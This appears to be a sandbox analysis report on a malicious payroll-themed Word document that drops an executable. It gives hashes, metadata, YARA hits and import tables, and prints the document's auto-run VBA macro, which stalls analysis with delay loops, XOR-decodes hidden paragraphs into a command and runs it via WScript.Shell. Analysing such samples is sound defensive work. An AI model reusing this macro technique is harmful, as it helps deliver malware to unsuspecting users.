VTI SCORE: 100/100
| Dynamic Analysis Report |
| Classification: Dropper, Downloader |
a14e514ddfc3a921c5a9e2fc9b931bc734b4927fa9d4b011ab77f9e46da50b34 (SHA256)
Order_Payroll_81154032.doc
Word Document
Created at 2019-02-06 16:40:00
Notifications (1/1)
The overall sleep time of all monitored processes was truncated from "20 seconds" to "10 seconds" to reveal dormant functionality.
This is a filtered view
This list contains only the embedded files and created files
| Filters: |
There are no files for this filter
There are no files in this analysis
| Filename | Category | Type | Severity | Actions |
|---|
| C:\Users\aETAdzjz\Desktop\Order_Payroll_81154032.doc | Sample File | Word Document |
Suspicious
|
...
|
»
| Mime Type | application/msword |
| File Size | 169.00 KB |
| MD5 |
5e798794638d40e80c22e539521158ca
|
| SHA1 |
7b845d0659f80ceb1ebfc85e580c716be3f5eed5
|
| SHA256 |
a14e514ddfc3a921c5a9e2fc9b931bc734b4927fa9d4b011ab77f9e46da50b34
|
| SSDeep |
3072:MggRr1xBwqdXNuaIMh8bHpX2z3ZlG0s5Zc4s7qZoajik9QAF6fTLimUVSSUk6:Mg0pxvZQaITpGWzljiU6fvimU
|
Office Information
»
| Creator | Пользователь Windows |
| Last Modified By | Пользователь Windows |
| Revision | 81 |
| Create Time | 2019-01-30 16:46:00+00:00 |
| Modify Time | 2019-02-06 13:08:00+00:00 |
Document Information
»
| Codepage | Cryllic |
| Application | Microsoft Office Word |
| App Version | 15.0 |
| Template | Normal.dotm |
| Document Security | SecurityFlag.NONE |
| Editing Time | 34140.0 |
| Page Count | 1 |
| Line Count | 10 |
| Paragraph Count | 2 |
| Word Count | 211 |
| Character Count | 1208 |
| Chars With Spaces | 1417 |
| Heading Pairs | Название |
| scale_crop | False |
| shared_doc | False |
VBA Macros (2)
»
Macro #1: Loi1
»
Attribute VB_Name = "Loi1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Dim slsume As String
slsume = "adeetrvdf"
Duren ("Wrst")
End Sub
Macro #2: HHlau
»
Attribute VB_Name = "HHlau"
Dim lore As Bookmarks
''Priva__te Dec __lare Function Create--------Process Lib "kernel32" Alias "Crea__________teProcessA" (ByVal lpAppli_---cationName As Str___ing, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
'' Dec l a re Su b Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Sub Rhoi()
sleep 14563
Rhoi = 128
MsgBox "Zubli12"
End Sub
Sub GetDecStr(ET As String, ByRef CS As String)
Dim i As Integer
CS = "_______12323==========kdrjgehjrtghjhjGHHGHGFG"
UpperPart = LowerPart = 0
For i = 1 To Len(ET) Step 2
CS = CS + Chr(GetDecChar(ET, i))
Next i
End Sub
Sub Duren(KL As String)
Dim fli As String, trm
'al24 = ActiveDocument.Paragraphs(9).Range
'MsgBox (al24)
''ehui = LOnsh("*", 149)
'' ohuenobl12.Name
For tyu = 1231 To 21789111 '00000 ''retervd
why = tyu
Next tyu
''sleep (5000)
''Application.Wait (Now + TimeValue("0:00:05"))
''MsgBox ("dgt56778sdfrt")
''Application.OnTime Now + TimeValue("00:00:03"), "Proc"
'Wait Time:=Now + TimeSerial(0, 0, 3)
''MsgBox ("run")
If KL = "Wrst" Then ruti (589)
End Sub
Sub ruti(UA As Integer)
If UA = 589 Then
jbl__91 = Yobna("V", 186)
End If
End Sub
Sub Rerid()
End Sub
Private Function GutDicSher65(ByVal ET As String)
Dim MMX_____2 As String
MMX_____2 = "1243455asdfsdf___+++==s=dfsdfsf$$%%%DEFsfrrefsJHJGHGFHBH1098873545"
Dim i As Integer
Dim DecScr As String
DecScr = ""
''MsgBox (Len(ET))
For i = 1 To Len(ET) - 1 Step 2 ''Len(ET)
DecScr = DecScr + Chr(LOtDicSmal(ET, i))
''MsgBox (DecScr)
Next i
GutDicSher65 = DecScr
End Function
Private Function LOtDicSmal(ET As String, i As Integer) As Integer 'Even_odd
Dim UP As Integer, LP As Integer
Dim u As Integer
Dim WWW As String
u = (i + 1) \ 2
''If k > 8 Then k = k - 8
u = u Mod 16
If u = 0 Then u = 16
WWW = Asc(Mid(ActiveDocument.Paragraphs(3 + 2 + 1).Range, u, 1))
UP = GetCorrPart(Asc(Mid(ET, i, 1)))
LP = GetCorrPart(Asc(Mid(ET, i + 1, 1)))
LOtDicSmal = JitLohSup(UP, LP, WWW)
End Function
Private Function JitLohSup(ByVal UPart As Integer, ByVal LPart As Integer, ByVal LDR As Integer) As Integer
JitLohSup = (UPart * (7 + 9) + LPart) Xor LDR
End Function
Private Function GetCorrPart(ByVal Part As Integer) As Integer
Dim tmpPart As Integer
tmpPart = Part
If tmpPart >= 48 And tmpPart <= 57 Then
tmpPart = tmpPart - 48
ElseIf tmpPart >= 65 And tmpPart <= 70 Then
tmpPart = tmpPart - 55
Else: tmpPart = tmpPart - 81 ''55 - 32
End If
GetCorrPart = tmpPart
End Function
Private Function Duram(ByVal frau_67 As String, ByVal Von1 As Integer) As Integer
If Dan56 - 139 = Asc(frau_67) Then
End If
If Von1 - 36 - 30 - 41 = Asc(frau_67) + 2 * 0 Then
' Ca ll gruff f(GetDec_________Str2(Activ___________eDocument.Paragraphs(13).Range) & _
' GetDecStr2(ActiveDocument.Paragraphs(24).Range) & _
' GetDecStr2(ActiveDocument.Paragraphs(57).Range) & _
'MsgBox (ActiveDocument.Paragraphs(11).Range)
'MsgBox (ActiveDocument.Paragraphs(12).Range)
'MsgBox (ActiveDocument.Paragraphs(13).Range)
End If
Duram = 79
End Function
Private Function Yobna(ByVal sukl As String, ByVal Trud As Integer) As Integer
If Asc(sukl) + 100 = Trud Then
Set GMO = CreateObject("WScript.Shell")
''Set we = ws.Exec(GetDecStr2(Cells(2, 1).Text) + GetDecStr2(Cells(3, 1).Text) + GetDecStr2(Cells(4, 1).Text) + GetDecStr2(Cells(5, 1).Text) + GetDecStr2(Cells(6, 1).Text) + GetDecStr2(Cells(7, 1).Text) + GetDecStr2(Cells(8, 1).Text) + GetDecStr2(Cells(9, 1).Text) + GetDecStr2(Cells(10, 1).Text) + GetDecStr2(Cells(11, 1).Text))
'we = ws.Run(GetDecStr2(ActiveDocument.Paragraphs(17).Range) & _
''MsgBox ("run")GMO.Run
''MsgBox (ActiveDocument.Paragraphs(3 + 2 + 1))
''MsgBox (GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 3).Range))
Ass = GMO.Run(GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 3).Range) + GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 5).Range) & _
GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 7).Range) & _
GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 8).Range) & GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 9).Range) & _
GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 10).Range) & _
GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 11).Range) & GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 12).Range) + GutDicSher65(ActiveDocument.Paragraphs(3 + 2 + 13).Range), 111)
End If
End Function
'
YARA Matches
»
| Rule Name | Rule Description | Classification | Severity | Actions |
|---|---|---|---|---|
| VBA_Execution_Commands | VBA macro may execute files or system commands | - |
3/5
|
...
|
| VBA_Time_Delay_with_HighVal | VBA macro utilizes long time delay functions; possible analysis counter-measure | - |
3/5
|
...
|
| VBA_Execution_Commands | VBA macro may execute files or system commands | - |
3/5
|
...
|
| VBA_Time_Delay_with_HighVal | VBA macro utilizes long time delay functions; possible analysis counter-measure | - |
3/5
|
...
|
| C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe | Created File | Unknown |
Whitelisted
|
...
|
»
| Also Known As |
c:\users\aetadzjz\appdata\local\temp\tar1111.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab123a.tmp (Created File) c:\users\aetadzjz\appdata\local\temp\tar123b.tmp (Created File) c:\users\aetadzjz\appdata\local\temp\cab2935.tmp (Created File) c:\users\aetadzjz\appdata\local\temp\tar2946.tmp (Created File) C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe (Created File) |
| Mime Type | application/x-empty |
| File Size | 0.00 KB |
| MD5 |
d41d8cd98f00b204e9800998ecf8427e
|
| SHA1 |
da39a3ee5e6b4b0d3255bfef95601890afd80709
|
| SHA256 |
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
|
| SSDeep |
3::
|
File Reputation Information
»
| Severity |
Whitelisted
|
| First Seen | 2011-05-27 11:27 (UTC+2) |
| Last Seen | 2017-04-19 12:47 (UTC+2) |
| c:\users\aetadzjz\appdata\local\temp\tar1111.tmp | Created File | Stream |
Whitelisted
|
...
|
»
| Also Known As | c:\users\aetadzjz\appdata\local\temp\tar123b.tmp (Created File) |
| Mime Type | application/octet-stream |
| File Size | 126.77 KB |
| MD5 |
4479a52b31b6bde89384fb63854ec382
|
| SHA1 |
71386477836e4081befb501a266ccc4c984030e0
|
| SHA256 |
8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2
|
| SSDeep |
1536:blzA+FFTLO9oHCLYyBFfLARZk2YueKQR7A/MGs:blH7RHCVBFERxeKh/6
|
File Reputation Information
»
| Severity |
Whitelisted
|
| First Seen | 2017-09-28 06:18 (UTC+2) |
| Last Seen | 2019-01-30 16:29 (UTC+1) |
| c:\users\aetadzjz\appdata\local\temp\cab1110.tmp | Created File | Unknown |
Whitelisted
|
...
|
»
| Also Known As | c:\users\aetadzjz\appdata\local\temp\cab123a.tmp (Created File) |
| Mime Type | application/vnd.ms-cab-compressed |
| File Size | 52.71 KB |
| MD5 |
03f9e1f45c0d5fe8e08af7449ba1fa2f
|
| SHA1 |
da545c3133a914434cce940bae78d8ad180a529a
|
| SHA256 |
677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
|
| SSDeep |
1536:26Ley1Fr+ZuhxsffPTWBbJR51GpX/RCy7Y22JO8jd:NLZxufLURrGJ/UZdh
|
File Reputation Information
»
| Severity |
Whitelisted
|
| First Seen | 2017-09-26 19:08 (UTC+2) |
| Last Seen | 2019-01-30 16:36 (UTC+1) |
| c:\users\aetadzjz\appdata\local\temp\tar2946.tmp | Created File | Stream |
Whitelisted
|
...
|
»
| Mime Type | application/octet-stream |
| File Size | 134.03 KB |
| MD5 |
b463cd6c6009093970e280027c2a4464
|
| SHA1 |
1a3b9cc56839a880ad3f1e8be1133e0af31c7437
|
| SHA256 |
6e4b7d405ab1ad163119355e28d1d385b2b9c45d114dca7e819849d3057afa33
|
| SSDeep |
1536:nr6GvaYIqKl0YKuQPM4FSXUy/k8ER711MtvU/cRZsGxK:n2VYLKlnXR5ER7TEXjK
|
File Reputation Information
»
| Severity |
Whitelisted
|
| First Seen | 2018-11-29 09:08 (UTC+1) |
| Last Seen | 2018-12-13 12:46 (UTC+1) |
| c:\users\aetadzjz\appdata\local\temp\cab2935.tmp | Created File | Unknown |
Whitelisted
|
...
|
»
| Mime Type | application/vnd.ms-cab-compressed |
| File Size | 55.22 KB |
| MD5 |
a902cf373e02f7dc34f456ed7449279c
|
| SHA1 |
9d2aad0f901326cf1bee66ce68fd5b79b39ad76d
|
| SHA256 |
ea0c12aedea644678014991a96534145e85aa12cd8955396dfdc98a4fc96f0d5
|
| SSDeep |
1536:e0o4QkMR6NylTBWlMJ29/zaWzePccAU6EB18iyvP:sL4clTBWScGZyvP
|
File Reputation Information
»
| Severity |
Whitelisted
|
| First Seen | 2018-11-28 09:11 (UTC+1) |
| Last Seen | 2019-01-24 10:30 (UTC+1) |
| c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 | Modified File | Stream |
Unknown
|
...
|
»
| Mime Type | application/octet-stream |
| File Size | 0.33 KB |
| MD5 |
825763db503404345d0cc6f1b9cc16b4
|
| SHA1 |
7b1fdd67816f4ec32f3673336b49362b9972dd69
|
| SHA256 |
a70303fc51b8ebb51ce502ef629196d27e2ad710c650aac0fe4dbb217c0f394c
|
| SSDeep |
6:kKm59WanMjIFqDlaG4Y+SkQlPlEGYRMY9z+4KlDA3RUegKt:wnzg4GokPlE99SNxAhUe/
|
| c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 | Modified File | Stream |
Unknown
|
...
|
»
| Mime Type | application/octet-stream |
| File Size | 0.33 KB |
| MD5 |
5e8dc82a175be5b2da59a5d669aee40b
|
| SHA1 |
1e8122a54a8149edd17a7c55b9d5e8747624b66d
|
| SHA256 |
6394e151640d8df4745643c2ece2371c26912604d7cd6cc5f5731b0c00dabedd
|
| SSDeep |
6:kKmh81zDlaG4Y+SkQlPlEGYRMY9z+4KlDA3RUegKt:W0z4GokPlE99SNxAhUe/
|
| C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe | Created File | Binary |
Unknown
|
...
|
»
| Also Known As | C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe (Created File) |
| Mime Type | application/x-dosexec |
| File Size | 372.83 KB |
| MD5 |
a748a4e6151f6d75cf93b2f899df23df
|
| SHA1 |
08f90b5474ba8e250d9b824602fe4cec6366bc48
|
| SHA256 |
2044fcca53a6dc26425147b78971bee2225f4e8ea3e096100e4edfbad1dac16d
|
| SSDeep |
6144:X11gGxJkPcgfqAAJ6ONxZ4cYjxfaQYf1QbicnRcftAhQgGNxRUc:X11goJkP/NAJEcYd7YfEc+AB
|
| ImpHash |
5a023790893b5e39d98bc45c2dbd1845
|
| Parser Error Remark | Static analyzer was unable to completely parse the analyzed file |
PE Information
»
| Image Base | 0x400000 |
| Entry Point | 0x40bb34 |
| Size Of Code | 0x10c00 |
| Size Of Initialized Data | 0x66e00 |
| File Type | executable |
| Subsystem | windows_gui |
| Machine Type | i386 |
| Compile Timestamp | 2019-02-06 13:55:57+00:00 |
Sections (4)
»
| Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
|---|---|---|---|---|---|---|
| .text | 0x401000 | 0x10a6a | 0x10c00 | 0x400 | cnt_code, mem_execute, mem_read | 6.27 |
| .rdata | 0x412000 | 0x48688 | 0x48800 | 0x11000 | cnt_initialized_data, mem_read | 6.23 |
| .data | 0x45b000 | 0x1ccfc | 0x1000 | 0x59800 | cnt_initialized_data, mem_read, mem_write | 2.19 |
| .rsrc | 0x478000 | 0x1800 | 0x1800 | 0x5a800 | cnt_initialized_data, mem_read | 3.85 |
Imports (2)
»
USER32.dll (83)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| DrawIconEx | 0x0 | 0x4122d8 | 0x592f8 | 0x582f8 | 0xc8 |
| SetWindowLongW | 0x0 | 0x4122dc | 0x592fc | 0x582fc | 0x2c4 |
| GetWindowLongW | 0x0 | 0x4122e0 | 0x59300 | 0x58300 | 0x196 |
| GetDlgItem | 0x0 | 0x4122e4 | 0x59304 | 0x58304 | 0x127 |
| GetParent | 0x0 | 0x4122e8 | 0x59308 | 0x58308 | 0x164 |
| SetCapture | 0x0 | 0x4122ec | 0x5930c | 0x5830c | 0x280 |
| GetCapture | 0x0 | 0x4122f0 | 0x59310 | 0x58310 | 0x108 |
| ReleaseCapture | 0x0 | 0x4122f4 | 0x59314 | 0x58314 | 0x264 |
| PostMessageW | 0x0 | 0x4122f8 | 0x59318 | 0x58318 | 0x236 |
| UpdateWindow | 0x0 | 0x4122fc | 0x5931c | 0x5831c | 0x311 |
| InvalidateRect | 0x0 | 0x412300 | 0x59320 | 0x58320 | 0x1be |
| OffsetRect | 0x0 | 0x412304 | 0x59324 | 0x58324 | 0x225 |
| PtInRect | 0x0 | 0x412308 | 0x59328 | 0x58328 | 0x240 |
| ScreenToClient | 0x0 | 0x41230c | 0x5932c | 0x5832c | 0x26d |
| GetCursorPos | 0x0 | 0x412310 | 0x59330 | 0x58330 | 0x120 |
| BeginPaint | 0x0 | 0x412314 | 0x59334 | 0x58334 | 0xe |
| SendMessageW | 0x0 | 0x412318 | 0x59338 | 0x58338 | 0x27c |
| DefWindowProcW | 0x0 | 0x41231c | 0x5933c | 0x5833c | 0x9c |
| PostQuitMessage | 0x0 | 0x412320 | 0x59340 | 0x58340 | 0x237 |
| GetDC | 0x0 | 0x412324 | 0x59344 | 0x58344 | 0x121 |
| ReleaseDC | 0x0 | 0x412328 | 0x59348 | 0x58348 | 0x265 |
| IsDialogMessageW | 0x0 | 0x41232c | 0x5934c | 0x5834c | 0x1cd |
| MoveWindow | 0x0 | 0x412330 | 0x59350 | 0x58350 | 0x21b |
| CopyRect | 0x0 | 0x412334 | 0x59354 | 0x58354 | 0x55 |
| DestroyWindow | 0x0 | 0x412338 | 0x59358 | 0x58358 | 0xa6 |
| LoadImageW | 0x0 | 0x41233c | 0x5935c | 0x5835c | 0x1ef |
| DestroyIcon | 0x0 | 0x412340 | 0x59360 | 0x58360 | 0xa3 |
| LoadBitmapW | 0x0 | 0x412344 | 0x59364 | 0x58364 | 0x1e7 |
| GetSystemMetrics | 0x0 | 0x412348 | 0x59368 | 0x58368 | 0x17e |
| TrackPopupMenu | 0x0 | 0x41234c | 0x5936c | 0x5836c | 0x2f6 |
| DestroyMenu | 0x0 | 0x412350 | 0x59370 | 0x58370 | 0xa4 |
| DrawStateW | 0x0 | 0x412354 | 0x59374 | 0x58374 | 0xcc |
| SetMenuItemInfoW | 0x0 | 0x412358 | 0x59378 | 0x58378 | 0x2a2 |
| CheckMenuItem | 0x0 | 0x41235c | 0x5937c | 0x5837c | 0x3f |
| AppendMenuW | 0x0 | 0x412360 | 0x59380 | 0x58380 | 0xa |
| CreatePopupMenu | 0x0 | 0x412364 | 0x59384 | 0x58384 | 0x6b |
| IsWindowVisible | 0x0 | 0x412368 | 0x59388 | 0x58388 | 0x1e0 |
| ExitWindowsEx | 0x0 | 0x41236c | 0x5938c | 0x5838c | 0xf5 |
| wsprintfW | 0x0 | 0x412370 | 0x59390 | 0x58390 | 0x333 |
| RegisterWindowMessageW | 0x0 | 0x412374 | 0x59394 | 0x58394 | 0x263 |
| GetWindowTextLengthW | 0x0 | 0x412378 | 0x59398 | 0x58398 | 0x1a2 |
| GetWindowTextW | 0x0 | 0x41237c | 0x5939c | 0x5839c | 0x1a3 |
| SetWindowTextW | 0x0 | 0x412380 | 0x593a0 | 0x583a0 | 0x2cb |
| GetWindowDC | 0x0 | 0x412384 | 0x593a4 | 0x583a4 | 0x192 |
| CreateAcceleratorTableW | 0x0 | 0x412388 | 0x593a8 | 0x583a8 | 0x58 |
| GetFocus | 0x0 | 0x41238c | 0x593ac | 0x583ac | 0x12c |
| DestroyAcceleratorTable | 0x0 | 0x412390 | 0x593b0 | 0x583b0 | 0xa0 |
| IsChild | 0x0 | 0x412394 | 0x593b4 | 0x583b4 | 0x1c9 |
| InvalidateRgn | 0x0 | 0x412398 | 0x593b8 | 0x583b8 | 0x1bf |
| ClientToScreen | 0x0 | 0x41239c | 0x593bc | 0x583bc | 0x47 |
| GetSysColor | 0x0 | 0x4123a0 | 0x593c0 | 0x583c0 | 0x17b |
| RegisterClassExW | 0x0 | 0x4123a4 | 0x593c4 | 0x583c4 | 0x24d |
| CharNextW | 0x0 | 0x4123a8 | 0x593c8 | 0x583c8 | 0x31 |
| PeekMessageW | 0x0 | 0x4123ac | 0x593cc | 0x583cc | 0x233 |
| GetMessageW | 0x0 | 0x4123b0 | 0x593d0 | 0x583d0 | 0x15d |
| TranslateMessage | 0x0 | 0x4123b4 | 0x593d4 | 0x583d4 | 0x2fc |
| DispatchMessageW | 0x0 | 0x4123b8 | 0x593d8 | 0x583d8 | 0xaf |
| PostThreadMessageW | 0x0 | 0x4123bc | 0x593dc | 0x583dc | 0x239 |
| GetKeyboardLayoutList | 0x0 | 0x4123c0 | 0x593e0 | 0x583e0 | 0x13f |
| GetClassInfoExW | 0x0 | 0x4123c4 | 0x593e4 | 0x583e4 | 0x10d |
| EnableWindow | 0x0 | 0x4123c8 | 0x593e8 | 0x583e8 | 0xd8 |
| AdjustWindowRectEx | 0x0 | 0x4123cc | 0x593ec | 0x583ec | 0x3 |
| GetWindow | 0x0 | 0x4123d0 | 0x593f0 | 0x583f0 | 0x18e |
| MonitorFromWindow | 0x0 | 0x4123d4 | 0x593f4 | 0x583f4 | 0x21a |
| RedrawWindow | 0x0 | 0x4123d8 | 0x593f8 | 0x583f8 | 0x24a |
| EndDialog | 0x0 | 0x4123dc | 0x593fc | 0x583fc | 0xda |
| DialogBoxIndirectParamW | 0x0 | 0x4123e0 | 0x59400 | 0x58400 | 0xaa |
| DrawTextW | 0x0 | 0x4123e4 | 0x59404 | 0x58404 | 0xd0 |
| LoadCursorW | 0x0 | 0x4123e8 | 0x59408 | 0x58408 | 0x1eb |
| SetRect | 0x0 | 0x4123ec | 0x5940c | 0x5840c | 0x2ae |
| ShowWindow | 0x0 | 0x4123f0 | 0x59410 | 0x58410 | 0x2df |
| GetActiveWindow | 0x0 | 0x4123f4 | 0x59414 | 0x58414 | 0x100 |
| SetWindowRgn | 0x0 | 0x4123f8 | 0x59418 | 0x58418 | 0x2c7 |
| SetWindowPos | 0x0 | 0x4123fc | 0x5941c | 0x5841c | 0x2c6 |
| FindWindowW | 0x0 | 0x412400 | 0x59420 | 0x58420 | 0xfa |
| GetKeyboardState | 0x0 | 0x412404 | 0x59424 | 0x58424 | 0x142 |
| keybd_event | 0x0 | 0x412408 | 0x59428 | 0x58428 | 0x330 |
| GetForegroundWindow | 0x0 | 0x41240c | 0x5942c | 0x5842c | 0x12d |
| GetWindowThreadProcessId | 0x0 | 0x412410 | 0x59430 | 0x58430 | 0x1a4 |
| SetForegroundWindow | 0x0 | 0x412414 | 0x59434 | 0x58434 | 0x293 |
| SetActiveWindow | 0x0 | 0x412418 | 0x59438 | 0x58438 | 0x27f |
| SetFocus | 0x0 | 0x41241c | 0x5943c | 0x5843c | 0x292 |
| MonitorFromPoint | 0x0 | 0x412420 | 0x59440 | 0x58440 | 0x218 |
KERNEL32.dll (181)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| GetFullPathNameW | 0x0 | 0x412000 | 0x59020 | 0x58020 | 0x1fb |
| LCMapStringEx | 0x0 | 0x412004 | 0x59024 | 0x58024 | 0x32c |
| RtlUnwind | 0x0 | 0x412008 | 0x59028 | 0x58028 | 0x418 |
| FlsFree | 0x0 | 0x41200c | 0x5902c | 0x5802c | 0x153 |
| FlsSetValue | 0x0 | 0x412010 | 0x59030 | 0x58030 | 0x155 |
| FlsGetValue | 0x0 | 0x412014 | 0x59034 | 0x58034 | 0x154 |
| FlsAlloc | 0x0 | 0x412018 | 0x59038 | 0x58038 | 0x152 |
| GetTickCount64 | 0x0 | 0x41201c | 0x5903c | 0x5803c | 0x294 |
| InitOnceExecuteOnce | 0x0 | 0x412020 | 0x59040 | 0x58040 | 0x2df |
| InitializeCriticalSectionAndSpinCount | 0x0 | 0x412024 | 0x59044 | 0x58044 | 0x2e3 |
| GetModuleHandleExW | 0x0 | 0x412028 | 0x59048 | 0x58048 | 0x217 |
| InterlockedDecrement | 0x0 | 0x41202c | 0x5904c | 0x5804c | 0x2eb |
| InterlockedIncrement | 0x0 | 0x412030 | 0x59050 | 0x58050 | 0x2ef |
| DecodePointer | 0x0 | 0x412034 | 0x59054 | 0x58054 | 0xca |
| EncodePointer | 0x0 | 0x412038 | 0x59058 | 0x58058 | 0xea |
| IsDebuggerPresent | 0x0 | 0x41203c | 0x5905c | 0x5805c | 0x300 |
| GetCommandLineA | 0x0 | 0x412040 | 0x59060 | 0x58060 | 0x186 |
| WritePrivateProfileStringW | 0x0 | 0x412044 | 0x59064 | 0x58064 | 0x52b |
| MoveFileW | 0x0 | 0x412048 | 0x59068 | 0x58068 | 0x363 |
| GetEnvironmentVariableW | 0x0 | 0x41204c | 0x5906c | 0x5806c | 0x1dc |
| lstrlenA | 0x0 | 0x412050 | 0x59070 | 0x58070 | 0x54d |
| SetFileAttributesW | 0x0 | 0x412054 | 0x59074 | 0x58074 | 0x461 |
| RemoveDirectoryW | 0x0 | 0x412058 | 0x59078 | 0x58078 | 0x403 |
| SetEndOfFile | 0x0 | 0x41205c | 0x5907c | 0x5807c | 0x453 |
| GetStdHandle | 0x0 | 0x412060 | 0x59080 | 0x58080 | 0x264 |
| GetLogicalDriveStringsW | 0x0 | 0x412064 | 0x59084 | 0x58084 | 0x208 |
| EnterCriticalSection | 0x0 | 0x412068 | 0x59088 | 0x58088 | 0xee |
| ResumeThread | 0x0 | 0x41206c | 0x5908c | 0x5808c | 0x413 |
| OpenEventA | 0x0 | 0x412070 | 0x59090 | 0x58090 | 0x374 |
| CreateSemaphoreA | 0x0 | 0x412074 | 0x59094 | 0x58094 | 0xab |
| CancelIo | 0x0 | 0x412078 | 0x59098 | 0x58098 | 0x42 |
| DisconnectNamedPipe | 0x0 | 0x41207c | 0x5909c | 0x5809c | 0xe1 |
| GetOverlappedResult | 0x0 | 0x412080 | 0x590a0 | 0x580a0 | 0x238 |
| CreateNamedPipeW | 0x0 | 0x412084 | 0x590a4 | 0x580a4 | 0xa0 |
| ConnectNamedPipe | 0x0 | 0x412088 | 0x590a8 | 0x580a8 | 0x65 |
| SetNamedPipeHandleState | 0x0 | 0x41208c | 0x590ac | 0x580ac | 0x47c |
| PeekNamedPipe | 0x0 | 0x412090 | 0x590b0 | 0x580b0 | 0x38d |
| LeaveCriticalSection | 0x0 | 0x412094 | 0x590b4 | 0x580b4 | 0x339 |
| LoadResource | 0x0 | 0x412098 | 0x590b8 | 0x580b8 | 0x341 |
| FindResourceW | 0x0 | 0x41209c | 0x590bc | 0x580bc | 0x14e |
| SizeofResource | 0x0 | 0x4120a0 | 0x590c0 | 0x580c0 | 0x4b1 |
| MulDiv | 0x0 | 0x4120a4 | 0x590c4 | 0x580c4 | 0x366 |
| GetLastError | 0x0 | 0x4120a8 | 0x590c8 | 0x580c8 | 0x202 |
| GlobalFree | 0x0 | 0x4120ac | 0x590cc | 0x580cc | 0x2ba |
| GlobalUnlock | 0x0 | 0x4120b0 | 0x590d0 | 0x580d0 | 0x2c5 |
| GlobalLock | 0x0 | 0x4120b4 | 0x590d4 | 0x580d4 | 0x2be |
| GlobalAlloc | 0x0 | 0x4120b8 | 0x590d8 | 0x580d8 | 0x2b3 |
| GetCurrentThreadId | 0x0 | 0x4120bc | 0x590dc | 0x580dc | 0x1c5 |
| CloseHandle | 0x0 | 0x4120c0 | 0x590e0 | 0x580e0 | 0x52 |
| WaitForSingleObject | 0x0 | 0x4120c4 | 0x590e4 | 0x580e4 | 0x4f9 |
| CreateEventW | 0x0 | 0x4120c8 | 0x590e8 | 0x580e8 | 0x85 |
| OpenProcess | 0x0 | 0x4120cc | 0x590ec | 0x580ec | 0x380 |
| lstrcmpiA | 0x0 | 0x4120d0 | 0x590f0 | 0x580f0 | 0x544 |
| lstrcmpA | 0x0 | 0x4120d4 | 0x590f4 | 0x580f4 | 0x541 |
| SetEnvironmentVariableA | 0x0 | 0x4120d8 | 0x590f8 | 0x580f8 | 0x456 |
| CompareStringW | 0x0 | 0x4120dc | 0x590fc | 0x580fc | 0x64 |
| SetStdHandle | 0x0 | 0x4120e0 | 0x59100 | 0x58100 | 0x487 |
| WriteConsoleW | 0x0 | 0x4120e4 | 0x59104 | 0x58104 | 0x524 |
| WriteConsoleA | 0x0 | 0x4120e8 | 0x59108 | 0x58108 | 0x51a |
| ExpandEnvironmentStringsW | 0x0 | 0x4120ec | 0x5910c | 0x5810c | 0x11d |
| GetLocaleInfoA | 0x0 | 0x4120f0 | 0x59110 | 0x58110 | 0x204 |
| FlushFileBuffers | 0x0 | 0x4120f4 | 0x59114 | 0x58114 | 0x157 |
| GetConsoleMode | 0x0 | 0x4120f8 | 0x59118 | 0x58118 | 0x1ac |
| GetConsoleCP | 0x0 | 0x4120fc | 0x5911c | 0x5811c | 0x19a |
| GetStringTypeA | 0x0 | 0x412100 | 0x59120 | 0x58120 | 0x266 |
| QueryPerformanceCounter | 0x0 | 0x412104 | 0x59124 | 0x58124 | 0x3a7 |
| GetFileType | 0x0 | 0x412108 | 0x59128 | 0x58128 | 0x1f3 |
| SetHandleCount | 0x0 | 0x41210c | 0x5912c | 0x5812c | 0x46f |
| GetEnvironmentStringsW | 0x0 | 0x412110 | 0x59130 | 0x58130 | 0x1da |
| FreeEnvironmentStringsW | 0x0 | 0x412114 | 0x59134 | 0x58134 | 0x161 |
| GetDateFormatA | 0x0 | 0x412118 | 0x59138 | 0x58138 | 0x1c6 |
| GetTimeFormatA | 0x0 | 0x41211c | 0x5913c | 0x5813c | 0x295 |
| GetProcAddress | 0x0 | 0x412120 | 0x59140 | 0x58140 | 0x245 |
| GetModuleHandleA | 0x0 | 0x412124 | 0x59144 | 0x58144 | 0x215 |
| GetSystemDirectoryW | 0x0 | 0x412128 | 0x59148 | 0x58148 | 0x270 |
| FlushInstructionCache | 0x0 | 0x41212c | 0x5914c | 0x5814c | 0x158 |
| DeleteFileW | 0x0 | 0x412130 | 0x59150 | 0x58150 | 0xd6 |
| GlobalReAlloc | 0x0 | 0x412134 | 0x59154 | 0x58154 | 0x2c1 |
